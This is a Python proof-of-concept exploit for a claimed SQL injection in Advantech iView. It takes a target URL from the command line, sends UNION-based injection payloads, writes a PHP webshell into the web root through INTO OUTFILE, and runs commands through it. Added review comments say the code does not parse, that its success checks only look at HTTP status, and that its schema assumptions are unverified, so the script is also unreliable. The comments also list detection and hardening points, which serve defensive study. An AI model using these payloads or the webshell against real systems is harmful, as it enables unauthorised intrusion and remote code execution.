import requests
import sys
# CVE-2022-50593 PoC - Advantech iView SQL Injection RCE
# Target: Advantech iView < v5.7.04 build 6425
# Vulnerability: SQL Injection in search_term parameter (NetworkServlet)
# Impact: Authentication bypass + Remote Code Execution
def exploit_cve_2022_50593(target_url):
"""
Send the CVE-2022-50593 proof-of-concept requests to one iView base URL.

Exploitation steps as described by the author:
1. Bypass authentication via SNMP management tool
2. Inject malicious SQL via search_term parameter
3. Execute OS commands with administrator privileges

Args:
target_url: Base URL of the server; "/NetworkServlet" and "/shell.php"
are appended to it unchanged.

Returns:
True after a 200 response from the shell.php request, False when
requests raises a RequestException. Indentation was lost in this
listing, so the exact nesting of the return statements is inferred.

NOTE(review): nothing in this function verifies that SQL was executed or
that a command ran; both checks only compare the HTTP status code with 200,
so the "[+]" messages are not evidence that a host is vulnerable.
"""
try:
# Step 1: Authentication bypass
# NOTE(review): this dict is assigned but never sent in any request below,
# so step 1 of the docstring is not implemented in this listing.
auth_bypass_payload = {
'username': "admin' OR '1'='1",
'password': 'any'
}
# Step 2: SQL Injection via search_term parameter
# The strings are UNION-based; the last one uses MySQL-style INTO OUTFILE
# to write a PHP file under /var/www/html.
# NOTE(review): the ten-column layout, the admin_users table and the web-root
# path are asserted by the payloads, not derived from the target; whether
# they match a real iView deployment is not shown here.
# NOTE(review): the third literal is delimited with double quotes and also
# contains unescaped double quotes, so the listing does not parse as Python
# as written; treat this PoC as untested.
# Hardening note: on MySQL, INTO OUTFILE needs the FILE privilege and is
# constrained by secure_file_priv; restricting both limits this file write.
sql_injection_payloads = [
"' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM admin_users WHERE '1'='1",
"' UNION SELECT username,password,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM admin_users--",
"' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY '<?php system($_GET["cmd"]); ?>' WHERE '1'='1"
]
# Target endpoint
# Per the header of this file, builds before v5.7.04 build 6425 are affected;
# updating to that build or later is the remediation the page implies.
endpoint = f"{target_url}/NetworkServlet"
# Execute SQL injection
# Detection: each iteration is a GET to /NetworkServlet whose search_term
# carries UNION SELECT or INTO OUTFILE; no headers are set, so the requests
# library's default User-Agent is sent. Both are visible in access logs.
for payload in sql_injection_payloads:
params = {
'search_term': payload
}
print(f"[*] Sending payload: {payload}")
response = requests.get(endpoint, params=params, timeout=10)
# A 200 only means the servlet answered; the body is not inspected.
if response.status_code == 200:
print(f"[+] Payload sent successfully")
print(f"[*] Response length: {len(response.text)}")
# Step 3: RCE via uploaded webshell
# Triage indicators: an unexpected shell.php in the web root, and requests
# for /shell.php carrying a cmd query parameter.
webshell_url = f"{target_url}/shell.php"
cmd = 'whoami' # Change to any command
rce_response = requests.get(f"{webshell_url}?cmd={cmd}", timeout=10)
# NOTE(review): any resource answering 200 at this path triggers the
# success message; the response text is printed without being checked.
if rce_response.status_code == 200:
print(f"[+] RCE Successful!")
print(f"[*] Command output: {rce_response.text}")
return True
# Only transport-level failures (connection errors, timeouts) land here.
except requests.exceptions.RequestException as e:
print(f"[-] Error: {e}")
return False
# Command-line entry point: takes the target base URL as the first argument.
if __name__ == "__main__":
# Print usage and exit with status 1 when no URL is supplied.
if len(sys.argv) < 2:
print("Usage: python cve-2022-50593.py <target_url>")
print("Example: python cve-2022-50593.py http://vulnerable-server:8080")
sys.exit(1)
# NOTE(review): argv[1] is passed on as given; nothing here checks that it is
# a well-formed URL before requests are sent to it.
target = sys.argv[1]
print(f"[*] Exploiting CVE-2022-50593 on {target}")
# The boolean result is discarded, so the exit status does not reflect the
# outcome of the run.
exploit_cve_2022_50593(target)